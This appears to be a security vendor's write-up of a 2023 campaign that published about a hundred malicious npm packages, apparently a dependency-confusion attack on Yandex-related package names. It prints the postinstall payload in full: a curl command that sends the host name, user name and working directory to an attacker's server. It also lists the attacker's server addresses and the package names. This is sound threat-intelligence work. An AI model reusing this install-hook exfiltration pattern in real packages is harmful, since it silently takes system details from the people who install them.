Overview
NPM has made great strides in improving the security of the ecosystem, adding nice features like identifying potential typosquats before the packages are published. Despite this, however, malicious packages continue to be published to unsuspecting users.
On January 29, 2023, the Phylum platform notified us of 101 malicious NPM packages.
Technical Details
Malware in the form of malicious NPM packages has recently been discovered in the npm registry. The malware author has been publishing packages with a payload in the postinstall script of the package.json file, which is executed when the package is installed. The script is used to gather information from the infected system and send it to a remote server.
The malware payload in the postinstall script is as follows:
curl -H "Package: tanker-branch" -H "Version: 1.3.2" -H "Hostname: $(hostname | base64)" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d "meow! security test"http://npm_new.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ruThis script is sending the hostname, username, current working directory, and the package name and version to a remote server located at http://npm_new.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru.
Update 1/30/2023: The remote server has changed slightly across package publications over the last 24-hours. The current list of known addresses is as follows:
http://npm-frontend.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ruhttp://npm-taxi.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ruhttp://npm-org.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ruhttp://npm-new.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ruhttp://npm.bl04szombv0uaoedbxwle53be2ks8h.c.act1on3.ru
The following is a list of the known malicious NPM packages:
- @b2bgeo/backend-api-types
- @b2bgeo/certs
- @b2bgeo/ci-aws
- @b2bgeo/ci-github
- @b2bgeo/ci-s3
- @b2bgeo/ci-startrek
- @b2bgeo/configs
- @b2bgeo/design-system
- @b2bgeo/frontend-server-api-types
- @b2bgeo/map-icons
- @b2bgeo/run-if-changed
- @b2bgeo/run-in-packages
- @b2bgeo/tanker
- @b2bgeo/utils
- @b2bgeo/yav
- @realty-front/ad
- @realty-front/codegen
- @realty-front/dayjs
- @realty-front/dev-tools
- @realty-front/eslint-plugin
- @realty-front/icons
- @realty-front/jest-utils
- @realty-front/payment-cards
- @realty-front/stylelint-plugins
- @realty-front/webpack-utils
- @realty-front/ydb
- @realty-front/zookeeper
- @yandex-travel/ci
- @yandex-travel/eslint-config
- @yandex-travel/eslint-kit
- @yandex-travel/ts-config
- @yandex-travel/ui
- afisha-ab
- auto-issues
- bemhint.i18n
- bemhint-plugins
- bem-mvc-direct
- borschik-webp-internal
- borshik-webp-internal
- branch-to-cmsg
- bunker-avatar
- bunker-tjson
- changelog-tool
- csp-preset-yastatic
- delta-editor
- divcard2
- domains-uglify
- eslint-config-distribution
- eslint-config-promo
- eslint-plugin-hermione-serp
- eslint-plugin-yandex-morda-views
- express-http-geobase
- express-http-langdetect
- express-tvm-nodejs4
- express-yandex-send-limit
- fiji-svg-sprite
- hermione-login-plugin
- images-inliner
- issues-changelog-generator
- karma-i-ua
- karma-jasmine-i-request
- karma-jasmine-i-global
- karma-jquery2
- karma-wait-for-load
- kroniko
- lego-stuff
- meccano
- middleware-idm-response
- mini-suggest
- mobile-auth-library-react-native
- mowo
- node-gulp-tanker
- node-http-uatraits
- pdb-extensions
- pdb-geobase
- pdb-uatraits
- pino-deploy
- portal-node-logger
- postcss-file-match
- react-wp-viewer
- realty-front/zookeeper
- remove-docker-tag
- route-converter
- searchband-frontend-assistant
- sendbernar
- simple-qloud-logger
- skip-validator
- staff-api
- staff-lite
- staff-www
- stylelint-config-promo
- supchat-plugins
- tanker-branch
- tanker-pilot
- tanker-ts-i18n
- taxi-localization
- taxi-monitoring
- testpalm-api
- toloka-templates-deploy
- toolbox-bem-bundle
- tools-access-configs
- tools-access-express
- tools-access-lego
- tools-access-react
- tools-access-react-redux
- tools-access-react-redux-router
- tslint-ymaps-rules
- ufo-helpers
- ufo-rocks2
- vow-got
- web-suggest
- y-dot
- y-font-decoder
- yabox
- yandex-net
- yandex-bro-embedded-site-api
- yandex-cfg-env
- yandex-cssformat
- yandex-dch-up
- yandex-logger-qloud
- yandex-logger-sentry
- yandex-logger-std
- yandex-sanitizer
- yandex-sendsms
- yandex-sendlinksms
- yappy_ts
- yasap-bump
- yasap-cache
- yasap-gulp-dev-tools
- yasap-gulp-tools
- yasap-lodash
- yastatic-s3
- yb-frontend-components
- yb-frontend-utils
- ymaps-api-response
- ymaps-tanker
- yt-test-reporter
Mr. Anderson - Bug Bounty Researcher?
It is unclear how effective these publications have been. On Dec 14, 2022 Phylum reached out to an individual who was responsible for a similar campaign. Nearly a month later the user (going by the handle Thomas Anderson) responded claiming that this was a bug bounty test against Yandex and that the packages were created as part of a dependency confusion attack.
Regardless of Anderson's intent, this discovery highlights the importance of secure software supply chains and the need for organizations to be vigilant when using third-party packages in their applications.
